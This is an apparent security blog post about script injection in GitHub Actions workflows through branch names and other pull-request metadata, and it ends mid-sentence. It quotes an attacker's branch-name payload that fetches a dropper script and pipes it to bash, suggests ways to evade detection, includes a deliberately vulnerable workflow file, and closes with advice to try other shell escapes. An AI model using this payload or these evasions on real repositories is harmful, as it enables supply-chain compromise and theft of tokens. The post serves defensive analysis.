Malware Insights: GitHub Actions Script Injection

It's time to talk about how DevOps and CI/CD pipelines work in general, and how the lack of sanitization of arbitrary input data leads to a false sense of security practices.

Attack Vector

GitHub Actions allow to execute code inside an isolated sandbox, which means that they also allow the execution of arbitrary code (which is kind of the point behind it). The particular problem, however, is that GitHub / GitLab / etc runners also allow to use variables in their templates, which will be printed out to the shell that's executing an echo $variable command.

In each line of the GitHub Actions Log there is a specific echo $variable command which prints out the set inputs that are defined for each workflow. This also influences the UI as the log output is parsed and then used to update the UI with the state update inside the log. This might also lead to a potential XSS vector in the GitHub frontend, but has been unused/unproven at this time.

The first incident of this new type of attack vector has been discovered as GHSA-7x29-qqmq-v6qc , but I'm trying to describe the problem here and how potentially more context variables can be used for this type of infiltration.

# Executed inside the GitHub runner
echo "github.event_name: pull_request_target"
# ...
echo "first_input_name: ${first_input_name}"
echo "second_input_name: ${second_input_name}"
# ...
					

Arbitrary Unsanitized Inputs

This means, however, that every environment variable that's used inside an action.yml file can be potentially abused if the source for it contains arbitrary data that's not filtered to contain no special characters and no escape characters.

In the recent example that happened to the ultralytics/ultralytics repository, the attacker used the following name as the pull request's branch name to execute their malware dropper. In order to avoid potential web app firewalls that block network traffic, the attacker alread avoided using an https:// prefix, and hosted the malicious script code on a gist on github to avoid detection.

The pull request's branch name :

openimbot:$({curl,-sSfL,raw.githubusercontent.com/username/hash_of_gist/dropper.sh}${IFS}|${IFS}bash)

In order to reproduce it you can also use different escaping techniques that avoid a crappy detection mechanism, similar to SQL injection. For example, ";;$(curl,...) or a backslash or backtick using execution command might also work, as well as an invoked execution via a third-party command like perl , node or another REPL that supports execution via a CLI parameter.

In the first incident, however, the above git branch name led to the pull request action workflow being executed automatically, without any possibility to cancel it by concept, and lead to installing the malware via the downloaded and executed dropper.sh file that also had access to all other process environment variables including the GITHUB_TOKEN and other lateral movement possibilities.

The dropper then patched the generated zip/wheel files of the published python package for later runs, and inserted the crypto miner in those packages, but that's an unimportant detail in this context.

The problem is really that all environment variables and all variable inputs in CI/CD actions templates are potentially vulnerable to this, meaning that they need extra sanitization/validation steps or to be avoided at all cost.

Potentially vulnerable pull request action context variables at this point :

  • github.ref
  • github.base_ref
  • github.head_ref
  • github.workflow
  • github.event.pull_request.title
  • github.event.pull_request.body
  • github.event.pull_request.base.label
  • github.event.pull_request.base.ref
  • github.event.pull_request.base.full_name
  • github.event.pull_request.base.name
  • github.event.pull_request.base.owner.login
  • github.event.pull_request.head.label
  • github.event.pull_request.head.ref
  • github.event.pull_request.head.full_name
  • github.event.pull_request.head.name
  • github.event.pull_request.head.owner.login

As you can see, a lot of meta data is passed down in the JSON data that comes from arbitrary sources. You should therefore be really cautious about what kind of metadata you include in your action.yml file.

Vulnerable Example

This vulnerable example is an action.yml file, typicall located inside the repository's /.github or /.gitlab folder.

It demonstrates how both the attacker's repository full_name and git branch name can be used to execute shell code. The fact that the head_ref is wrapped inside an environment variable doesn't actually matter here and demonstrates the non-working mitigation that others have been wrongly recommending in the advisory.

Note that the actions/checkout plugin itself also runs a shell command behind the scenes, and also doesn't sanitize arguments that are passed to the executed shell commands later. It's running the git command via the private GitCommandManager.execGit method in case you want to audit it.

name: Publish Docs

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
  workflow_dispatch:
    inputs:
      publish_docs:
        description: "Publish something to https://example.com"
        default: "true"
        type: boolean

jobs:
  Docs:
    if: github.repository == 'example/repository'
    runs-on: ubuntu-latest
    env:
      GITHUB_REF: ${{ github.pull_request.head_ref }}
    steps:
      - name: Git config
        run: |
          git config --global user.name "Example User"
          git config --global user.email "user@example.com"
      - name: Checkout Repository
        uses: actions/checkout@v4
        with:
          repository: ${{ github.event.pull_request.head.repo.full_name }}
          token: ${{ secrets.GITHUB_TOKEN }}
          ref: ${{ env.GITHUB_REF }}
          fetch-depth: 0
      - name: Run something else
        run: echo "I was already pwned here"
					

Mitigation

The obvious mitigation is to check for unsanitized input variables and to not allow them to be used in your repository's action.yml file. There are ongoing efforts at this time to build validators that not only validate the schema of an action.yml file, but also check against whether or not the variables inside the template can be malformed and can lead to remote code executions.

The tool that I would recommend even though it's still in development is Zizmor as the author of it is very security conscious and uses a defensive programming style.

There might be some other tools available that are more stable, but as far as I know these only validate against the schema, not against vulnerabilities or weaknesses.

Security Checklist

As this type of problem is a regular occuring one for future changes of the action.yml file, I would like to point out that this sort of weakness needs regular ongoing audits and checks to prevent an infiltration of the build pipeline environment.

This is a supply chain attack with lateral movement capabilities, and should be treated with the highest risk assessment as it's able to influence pretty much everything end-to-end in regards to how your software is compiled, built, updated, published and distributed.

It might be fixable with a pre-receive hook that's running on the server-side in case your organization uses a self-hosted GitHub Enterprise, GitLab, Gitea, or Gogs instance. But as of today there's no software available to check these sorts of issues before the potentially vulnerable blob, git branch name, git user name, git user email etc. lands on the git server.

Also keep in mind that as git refs and git blobs are hashed, this might make it harder for your Forensics team to check for this sort of attack vector, because evidence trails can be easily obfuscated with git gc and by similar means that remove or modify the blob filesystem behind git.

Everything that's already pushed and received by git is stored in its .git/objects/ folder and may contain potentially dropper scripts and malware, and currently there is no check in place to prevent this if your repository is public.

Depending on your CI/CD configuration and actions workflow templates, the attacker then can just access the malware from the git blobs via git show : or similar and may not even need to download a malware, as it would appear in the pull request as an already deleted change or not at all if the diffing algorithm does not automatically rebase to the current pull request's HEAD .

On every change of your GitHub/GitLab Actions :

  • Don't run a Pull Request bot for untrusted members
  • Specifically allowlist trusted members for Pull Request workflow runs
  • Double-check all commits in reviews, run git gc on the pull request's HEAD to prevent abuse of hidden blobs
  • Use only the minimum amount of metadata you need for the actions workflow to complete
  • Check every environment variable for arbitrary sources
  • Check every GitHub/GitLab actions context variable for arbitrary sources

Personal Notes

As this attack vector is quite new and didn't happen a lot in the past as a supply chain attack, there's potentially a lot more to investigate.

As most alternatives to GitHub also include some form of CI/CD or actions automation, those software projects might also be affected. This means that there needs to be an audit for GitLab, Gitea, Gogs, and other alternatives to ensure that this type of arbitrary data input isn't executed inside a shell environment.

Technically, this sort of problem is a new weakness that has to be checked against regularly by an organization's DevSecOps teams, as it's reoccuring on every pull request and blob/tree change in git.

My personal recommendation would be to not execute a runner inside a shell environment, at all, but that's where the DevOps crowd would not agree with me as they sure do love their shell magic.

If I would have the time, I probably would implement a runner based on yaegi or another typesafe interpreter instead of executing commands in a shell. But that is a huge amount of work to do end-to-end, and might therefore not be feasible for most companies alone.

Pentesting Advice

As the described technique might not work in the future, I'd recommend to try out other shell escape techniques that either use third-party and preinstalled REPLs to execute inlined scripts or that use different types of encodings to escape those restricted shell environments.

A good start is to read the following chapters of these books :